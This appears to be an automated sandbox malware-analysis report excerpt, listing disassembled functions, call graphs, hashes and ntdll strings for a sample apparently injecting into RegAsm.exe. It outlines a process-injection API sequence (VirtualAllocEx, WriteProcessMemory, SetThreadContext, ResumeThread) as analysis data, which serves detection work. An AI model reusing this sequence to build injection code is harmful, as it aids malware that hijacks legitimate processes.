                                                        control_flow_graph 217 2791548-2791582 call 279063c 221 279158a-2791640 VirtualAllocEx 217->221 222 2791584-2791587 217->222 228 2791649-2791666 221->228 229 2791642-2791648 221->229 229->228
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02791633
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1398148862.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2790000_x.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: 998cf186b3279195d9cddab5678d0d8b5a96c055bec5c45e2a650910ee85881e
                                                        • Instruction ID: 8d522d767520ba291dd1e6c1f1ec8baecd1d98edea2722ea42e64332acb58a2d
                                                        • Opcode Fuzzy Hash: 998cf186b3279195d9cddab5678d0d8b5a96c055bec5c45e2a650910ee85881e
                                                        • Instruction Fuzzy Hash: 6431C471A003489FDB21DFA9D881BEEBFF5EF89320F248459D918E7251C7359846CBA4
                                                        Function 027917E0 Relevance: 1.6, APIs: 1, Instructions: 67injectionCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 232 27917e0-2791831 234 2791841-279187a WriteProcessMemory 232->234 235 2791833-279183f 232->235 236 279187c-2791882 234->236 237 2791883-27918ab 234->237 235->234 236->237
                                                        APIs
                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0279186D
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1398148862.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2790000_x.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessWrite
                                                        • String ID:
                                                        • API String ID: 3559483778-0
                                                        • Opcode ID: 3bda64eefea0f92ea367cf766809ff092771863a3fc4b76d33e11342a926b8f8
                                                        • Instruction ID: 07692322f4fbe5d7403ecccce3e16e13a202632ea032f91e8462b1fac7b2604a
                                                        • Opcode Fuzzy Hash: 3bda64eefea0f92ea367cf766809ff092771863a3fc4b76d33e11342a926b8f8
                                                        • Instruction Fuzzy Hash: CC2103B5D003499FDB10CF9AD885BDEBBF5FB48320F50852AE918A7340D778A950CBA0
                                                        Function 027905B4 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 240 27905b4-2791514 ReadProcessMemory 243 279151d-2791545 240->243 244 2791516-279151c 240->244 244->243
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(027DB7C8,?,?,?,?), ref: 02791507
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1398148862.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2790000_x.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: 8be324fdb1b44cdc53104075f1090312f5760299d2b451cd9c1a45ce310e7d96
                                                        • Instruction ID: da3d671ff856dc7471ee13870a4d2240332ad57fc3c4323e513f599f53f58d65
                                                        • Opcode Fuzzy Hash: 8be324fdb1b44cdc53104075f1090312f5760299d2b451cd9c1a45ce310e7d96
                                                        • Instruction Fuzzy Hash: 312100B59003499FCB20DF9AD884BDEBBF5FB48310F51842AE918A7350D778A950CBA1
                                                        Function 02791480 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 247 2791480-2791514 ReadProcessMemory 249 279151d-2791545 247->249 250 2791516-279151c 247->250 250->249
                                                        APIs
                                                        • ReadProcessMemory.KERNELBASE(027DB7C8,?,?,?,?), ref: 02791507
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1398148862.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2790000_x.jbxd
                                                        Similarity
                                                        • API ID: MemoryProcessRead
                                                        • String ID:
                                                        • API String ID: 1726664587-0
                                                        • Opcode ID: 769df352e451082b862d8b6b1138912a4fe301366f873089e80ef54b8cda82c4
                                                        • Instruction ID: 3f2cbb5b6ee4e9ce787f884da4cb86f652d36dbbc4523bfa22163deeb04ee447
                                                        • Opcode Fuzzy Hash: 769df352e451082b862d8b6b1138912a4fe301366f873089e80ef54b8cda82c4
                                                        • Instruction Fuzzy Hash: 64211475D003499FCB20CFAAD885ADEBBF5FB48320F51842AE958A7240D7399945CF60
                                                        Function 027913C0 Relevance: 1.6, APIs: 1, Instructions: 60threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 253 27913c0-279140c 255 2791418-2791421 253->255 256 279140e-2791416 253->256 257 2791422-2791444 Wow64SetThreadContext 255->257 256->255 258 279144d-2791475 257->258 259 2791446-279144c 257->259 259->258
                                                        APIs
                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 02791437
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1398148862.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2790000_x.jbxd
                                                        Similarity
                                                        • API ID: ContextThreadWow64
                                                        • String ID:
                                                        • API String ID: 983334009-0
                                                        • Opcode ID: f4e24c732809a12659cb213b95444006f6296f73e6e8b1bc95be21da579b9b40
                                                        • Instruction ID: f9af43672000f955e2a8d0ccdf0efabf555387c2462f95cec853bff55cd26ece
                                                        • Opcode Fuzzy Hash: f4e24c732809a12659cb213b95444006f6296f73e6e8b1bc95be21da579b9b40
                                                        • Instruction Fuzzy Hash: D52136B1D1021A9FCB10CF9AD985B9EFBF4FB09320F51812AD818B7340D778A9458FA1
                                                        Function 027915C8 Relevance: 1.6, APIs: 1, Instructions: 51memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 262 27915c8-2791603 263 279160b-2791640 VirtualAllocEx 262->263 264 2791649-2791666 263->264 265 2791642-2791648 263->265 265->264
                                                        APIs
                                                        • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 02791633
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1398148862.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2790000_x.jbxd
                                                        Similarity
                                                        • API ID: AllocVirtual
                                                        • String ID:
                                                        • API String ID: 4275171209-0
                                                        • Opcode ID: f060f91e5c640eb3d67fcf48f0adaea4665ca0ee8da8382d88eb6603e04cf23c
                                                        • Instruction ID: 4b792c486a22d488eb91986b51d8d4a4907781163023920e58b1393d83548093
                                                        • Opcode Fuzzy Hash: f060f91e5c640eb3d67fcf48f0adaea4665ca0ee8da8382d88eb6603e04cf23c
                                                        • Instruction Fuzzy Hash: E0110475D003499FDB20DF9AD944BDEBBF9EB48320F248419E518A7250C775A941CFA0
                                                        Function 027919F8 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 268 27919f8-2791a64 ResumeThread 270 2791a6d-2791a8a 268->270 271 2791a66-2791a6c 268->271 271->270
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.1398148862.0000000002790000.00000040.00000800.00020000.00000000.sdmp, Offset: 02790000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_2790000_x.jbxd
                                                        Similarity
                                                        • API ID: ResumeThread
                                                        • String ID:
                                                        • API String ID: 947044025-0
                                                        • Opcode ID: 0d083562435d53841027192c202984bd3a735fd38936376d7ceefcd221e5e4c7
                                                        • Instruction ID: 31bb2fe48207d73de257e4129e6847143ced51631d74dcb3724c7f8bef6c9564
                                                        • Opcode Fuzzy Hash: 0d083562435d53841027192c202984bd3a735fd38936376d7ceefcd221e5e4c7
                                                        • Instruction Fuzzy Hash: 4C1133B1D003498FDB20DF9AD444B9EFBF8EB48320F20841AD518A7340C778A940CFA4

                                                        Execution Graph

                                                        Execution Coverage:0.9%
                                                        Dynamic/Decrypted Code Coverage:5.3%
                                                        Signature Coverage:9.6%
                                                        Total number of Nodes:94
                                                        Total number of Limit Nodes:8
                                                        execution_graph 76246 42f743 76247 42f753 76246->76247 76248 42f759 76246->76248 76251 42e783 76248->76251 76250 42f77f 76254 42c913 76251->76254 76253 42e79e 76253->76250 76255 42c92d 76254->76255 76256 42c93e RtlAllocateHeap 76255->76256 76256->76253 76262 424883 76263 42489f 76262->76263 76264 4248c7 76263->76264 76265 4248db 76263->76265 76266 42c5e3 NtClose 76264->76266 76272 42c5e3 76265->76272 76269 4248d0 76266->76269 76268 4248e4 76275 42e7c3 RtlAllocateHeap 76268->76275 76271 4248ef 76273 42c5fd 76272->76273 76274 42c60e NtClose 76273->76274 76274->76268 76275->76271 76276 42f7a3 76279 42e6a3 76276->76279 76282 42c963 76279->76282 76281 42e6bc 76283 42c97d 76282->76283 76284 42c98e RtlFreeHeap 76283->76284 76284->76281 76354 424c13 76358 424c2c 76354->76358 76355 424c74 76356 42e6a3 RtlFreeHeap 76355->76356 76357 424c81 76356->76357 76358->76355 76359 424cb4 76358->76359 76361 424cb9 76358->76361 76360 42e6a3 RtlFreeHeap 76359->76360 76360->76361 76362 42bbb3 76363 42bbcd 76362->76363 76366 2e42df0 LdrInitializeThunk 76363->76366 76364 42bbf5 76366->76364 76285 413ba3 76289 413bc3 76285->76289 76287 413c2c 76288 413c22 76289->76287 76290 41b343 RtlFreeHeap LdrInitializeThunk 76289->76290 76290->76288 76367 417713 76368 417737 76367->76368 76369 417773 LdrLoadDll 76368->76369 76370 41773e 76368->76370 76369->76370 76291 401a88 76292 401aa0 76291->76292 76292->76292 76295 42fc13 76292->76295 76298 42e263 76295->76298 76299 42e27f 76298->76299 76308 407413 76299->76308 76301 42e295 76307 401bc0 76301->76307 76311 41b033 76301->76311 76303 42e2b4 76304 42c9b3 ExitProcess 76303->76304 76305 42e2c9 76303->76305 76304->76305 76322 42c9b3 76305->76322 76310 407420 76308->76310 76325 4163d3 76308->76325 76310->76301 76312 41b05f 76311->76312 76343 41af23 76312->76343 76315 41b0a4 76318 41b0c0 76315->76318 76320 42c5e3 NtClose 76315->76320 76316 41b08c 76317 41b097 76316->76317 76319 42c5e3 NtClose 76316->76319 76317->76303 76318->76303 76319->76317 76321 41b0b6 76320->76321 76321->76303 76323 42c9cd 76322->76323 76324 42c9de ExitProcess 76323->76324 76324->76307 76326 4163f0 76325->76326 76328 416409 76326->76328 76329 42d043 76326->76329 76328->76310 76331 42d05d 76329->76331 76330 42d08c 76330->76328 76331->76330 76336 42bc03 76331->76336 76334 42e6a3 RtlFreeHeap 76335 42d102 76334->76335 76335->76328 76337 42bc20 76336->76337 76340 2e42c0a 76337->76340 76338 42bc4c 76338->76334 76341 2e42c11 76340->76341 76342 2e42c1f LdrInitializeThunk 76340->76342 76341->76338 76342->76338 76344 41af3d 76343->76344 76348 41b019 76343->76348 76349 42bca3 76344->76349 76347 42c5e3 NtClose 76347->76348 76348->76315 76348->76316 76350 42bcbd 76349->76350 76353 2e435c0 LdrInitializeThunk 76350->76353 76351 41b00d 76351->76347 76353->76351

                                                        Executed Functions

                                                        Function 00417713 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 21 417713-41773c call 42f283 24 417742-417750 call 42f883 21->24 25 41773e-417741 21->25 28 417760-417771 call 42dd33 24->28 29 417752-41775d call 42fb23 24->29 34 417773-417787 LdrLoadDll 28->34 35 41778a-41778d 28->35 29->28 34->35
                                                        APIs
                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417785
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Load
                                                        • String ID:
                                                        • API String ID: 2234796835-0
                                                        • Opcode ID: 0396ba7618b5080a1dab921aa9300dfb6cdc16ec2d0a8df7c2b88b16f96075f0
                                                        • Instruction ID: ef218c5dbc6b20930d3451859673d93260f27ec247db2464c162181d6f05f61a
                                                        • Opcode Fuzzy Hash: 0396ba7618b5080a1dab921aa9300dfb6cdc16ec2d0a8df7c2b88b16f96075f0
                                                        • Instruction Fuzzy Hash: 620152B5E4010DA7DB10EAE1DD42FDEB3789B54308F4041A6E91897280F635EB588B95
                                                        Function 0042C5E3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 41 42c5e3-42c61c call 404793 call 42d833 NtClose
                                                        APIs
                                                        • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C617
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Close
                                                        • String ID:
                                                        • API String ID: 3535843008-0
                                                        • Opcode ID: a4d2f82d14d7ef9de03f5fb31a07a43316a28d965a2711414e41efd1720de95b
                                                        • Instruction ID: 028b0080753bcceccc310b12c3e816a606e161bf349aa6b9bb673d55414ea870
                                                        • Opcode Fuzzy Hash: a4d2f82d14d7ef9de03f5fb31a07a43316a28d965a2711414e41efd1720de95b
                                                        • Instruction Fuzzy Hash: 5BE046766042147BD220AAAADC41F9BB76CDFC5714F40402AFA1CA7282C674BA0686A5
                                                        Function 02E435C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 57 2e435c0-2e435cc LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 2f427e20be6c5468d5d99f28b5dbac3aba006dcdbb2e0393e06bbe958fbb3c54
                                                        • Instruction ID: 8ddb52af493d974aba51e569877f5ec692b5401a073d3d174acd856880b9c02f
                                                        • Opcode Fuzzy Hash: 2f427e20be6c5468d5d99f28b5dbac3aba006dcdbb2e0393e06bbe958fbb3c54
                                                        • Instruction Fuzzy Hash: B190023165551402D540B1584515707100587D0201F65D411B5424568E87958A91A9A2
                                                        Function 02E42C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 55 2e42c70-2e42c7c LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 51064b7fc9cccd2d04e8a3cc9986e348ebcf089ccd258bfb9ba003dbfa812100
                                                        • Instruction ID: 4f06d8d8e5142ff2d1ed74a299937a3c7e52f6c808b50b0d9745964f3f7508c0
                                                        • Opcode Fuzzy Hash: 51064b7fc9cccd2d04e8a3cc9986e348ebcf089ccd258bfb9ba003dbfa812100
                                                        • Instruction Fuzzy Hash: 3E90023125149802D550B158840574B000587D0301F59D411B9424658E869589D1B521
                                                        Function 02E42DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 56 2e42df0-2e42dfc LdrInitializeThunk
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: 543428a42e9e1f51ff4f881879339876efb290cba1c197228fcb1e5bb7d2c8b4
                                                        • Instruction ID: 4ed2e90ad178f62ed9a3f23a041237603b8f2f51c269c6f4c40963b4904c7e16
                                                        • Opcode Fuzzy Hash: 543428a42e9e1f51ff4f881879339876efb290cba1c197228fcb1e5bb7d2c8b4
                                                        • Instruction Fuzzy Hash: 7090023125141413D551B1584505707000987D0241F95D412B5424558E96568A92E521
                                                        Function 0042C963 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 42c963-42c9a4 call 404793 call 42d833 RtlFreeHeap
                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042C99F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID: ddA
                                                        • API String ID: 3298025750-2966775115
                                                        • Opcode ID: 7564854eb39361e781fc077a39cf7f05fd840d888161b235d5117c53bf2e62d9
                                                        • Instruction ID: bc38916f21879ea521ac51c5a0065a4ab8674fc5104214b9ab75167616a8a4e1
                                                        • Opcode Fuzzy Hash: 7564854eb39361e781fc077a39cf7f05fd840d888161b235d5117c53bf2e62d9
                                                        • Instruction Fuzzy Hash: 24E06DB1600208BBD610EE99EC41FAB77ACDFC9710F004019FA08A7282D670B9108AB9
                                                        Function 0042C913 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 36 42c913-42c954 call 404793 call 42d833 RtlAllocateHeap
                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(?,0041E4CB,?,?,00000000,?,0041E4CB,?,?,?), ref: 0042C94F
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: d5741e881d8271e84f6dddbe529997ff22183ce2d7331562038b0de660bc513c
                                                        • Instruction ID: 980aee6faa5663ee2f1bdfd708b10c920bf8aba62691be28648962c89cecb532
                                                        • Opcode Fuzzy Hash: d5741e881d8271e84f6dddbe529997ff22183ce2d7331562038b0de660bc513c
                                                        • Instruction Fuzzy Hash: A7E06DB56042187BD614EE99DC45EDB77ACEFC9710F000419FA08A7242D770B91186B4
                                                        Function 0042C9B3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 46 42c9b3-42c9ec call 404793 call 42d833 ExitProcess
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1720004612.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: ExitProcess
                                                        • String ID:
                                                        • API String ID: 621844428-0
                                                        • Opcode ID: d3d48852fb2c46eedb30a952ea8270b3be38bb1185362d301619dab6d89c4c8b
                                                        • Instruction ID: 05a3c6727b0f1e45394946eada7ecea23c2949999ef4cb5a0745f71b8f1555bd
                                                        • Opcode Fuzzy Hash: d3d48852fb2c46eedb30a952ea8270b3be38bb1185362d301619dab6d89c4c8b
                                                        • Instruction Fuzzy Hash: 5EE04F716402147BD214EA5ADC42FD7776CDFC5750F404019FA1867141C6707901C6F4
                                                        Function 02E42C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 51 2e42c0a-2e42c0f 52 2e42c11-2e42c18 51->52 53 2e42c1f-2e42c26 LdrInitializeThunk 51->53
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID:
                                                        • API String ID: 2994545307-0
                                                        • Opcode ID: e0ae798135960e035e94e649b5e61a6f6c7fa89017ba25c940554617c4e9c356
                                                        • Instruction ID: bc7124bdf8f9e5f1ad3e2f71cb8c754bc42f4a49a097e10295d9be75243d28fc
                                                        • Opcode Fuzzy Hash: e0ae798135960e035e94e649b5e61a6f6c7fa89017ba25c940554617c4e9c356
                                                        • Instruction Fuzzy Hash: 42B09B719415D5C5DE51E7605A09717790067D0705F15D061F7030641F4778D1D1F575

                                                        Non-executed Functions

                                                        Function 02E82349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-2160512332
                                                        • Opcode ID: d6df6b4f35e2815123bab709db06ab38928d10c4f0512bc21ac3ddba64555d77
                                                        • Instruction ID: a8a0b835ba5059e622fc58b7252c9287260bcb484731bb673af8f914b8a3e5cd
                                                        • Opcode Fuzzy Hash: d6df6b4f35e2815123bab709db06ab38928d10c4f0512bc21ac3ddba64555d77
                                                        • Instruction Fuzzy Hash: A4929E71684781AFE721EE24C840B6BB7E9BB84718F04991DFF9D97250D770E844CB92
                                                        Function 02DF68B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-3089669407
                                                        • Opcode ID: efcb6a3bd5046ba2b63c1a120bd927574e336f5f32da6cedab46746a1fe33aba
                                                        • Instruction ID: 06984625c8543157ea4255fb8f2fee2ba4d120c49fc161379fa5930dcff114f8
                                                        • Opcode Fuzzy Hash: efcb6a3bd5046ba2b63c1a120bd927574e336f5f32da6cedab46746a1fe33aba
                                                        • Instruction Fuzzy Hash: 1B8162B2D81618BBAB51EAD5EDD4EDF77BEAB44700B454822FA01F7100E630ED548BE0
                                                        Function 02E38620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 02E75543
                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02E7540A, 02E75496, 02E75519
                                                        • corrupted critical section, xrefs: 02E754C2
                                                        • Invalid debug info address of this critical section, xrefs: 02E754B6
                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02E754E2
                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 02E754CE
                                                        • Critical section debug info address, xrefs: 02E7541F, 02E7552E
                                                        • Critical section address., xrefs: 02E75502
                                                        • double initialized or corrupted critical section, xrefs: 02E75508
                                                        • Address of the debug info found in the active list., xrefs: 02E754AE, 02E754FA
                                                        • undeleted critical section in freed memory, xrefs: 02E7542B
                                                        • Thread identifier, xrefs: 02E7553A
                                                        • Critical section address, xrefs: 02E75425, 02E754BC, 02E75534
                                                        • 8, xrefs: 02E752E3
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                        • API String ID: 0-2368682639
                                                        • Opcode ID: 5ba4dd4022b56c2e491dd6f2b154332b0e395a6f09cc0c022c7acc475f935f3d
                                                        • Instruction ID: 3ff4c9b495606b2d8f28881aadfea5bc2010424ad2ea5103d28957bcb7537372
                                                        • Opcode Fuzzy Hash: 5ba4dd4022b56c2e491dd6f2b154332b0e395a6f09cc0c022c7acc475f935f3d
                                                        • Instruction Fuzzy Hash: 63819C71A80358AFEF60DF94D844BAEBBB6EB08704F509019F906B7290D371AD45DB60
                                                        Function 02E30F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                                        • API String ID: 0-360209818
                                                        • Opcode ID: a511a6bf74cc24d732b4445510bef93ddaed842bc8c37d2d32933692e67c848c
                                                        • Instruction ID: e9c5fb46d4401a993f0e241da369270fc6b465d8de6ae450321d38b2278f431a
                                                        • Opcode Fuzzy Hash: a511a6bf74cc24d732b4445510bef93ddaed842bc8c37d2d32933692e67c848c
                                                        • Instruction Fuzzy Hash: 91629CB1E402298FDB24CF18C8407A9B7B6AF95318F5592DAE84DAF240D7325EE1CF50
                                                        Function 02EB12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.1721576055.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_2dd0000_RegAsm.jbxd
                                                        Similarity
                                                        • API ID:
